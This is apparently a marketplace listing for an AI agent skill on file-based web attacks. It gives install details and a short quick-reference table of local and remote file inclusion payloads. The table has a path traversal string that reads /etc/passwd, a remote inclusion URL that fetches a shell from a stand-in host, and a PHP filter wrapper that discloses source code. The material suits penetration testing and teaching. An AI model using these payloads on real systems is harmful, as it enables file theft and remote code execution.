# File Attacks

> Skills for file-based web attacks including local and remote file inclusion.

- Skill: `omkar-ukirde/file-attacks` (Agent Skill, multi-file: 2 files)
- Install (CLI): `npx skillmds@latest add omkar-ukirde/file-attacks`
- Raw SKILL.md: https://api.skillmd.com/api/skills/omkar-ukirde/file-attacks/raw
- Safety review: pending (external: skill-scanner PASS, skillspector PASS)
- Works with: Claude Code, Claude.ai, OpenAI Codex
- Category: Coding & Dev Tools
- Author: omkar-ukirde (https://skillmd.com/u/omkar-ukirde)
- Updated: 2026-09-21
- Page: https://skillmd.com/skills/omkar-ukirde/file-attacks

---


# File-Based Attacks

Exploiting file handling vulnerabilities in web applications.

## Skills

- [File Inclusion](references/file-inclusion.md) - LFI/RFI exploitation

## Quick Reference

| Type | Payload | Impact |
|------|---------|--------|
| LFI | `../../../etc/passwd` | File read |
| RFI | `http://evil.com/shell.php` | RCE |
| PHP Wrapper | `php://filter/convert.base64-encode` | Source disclosure |

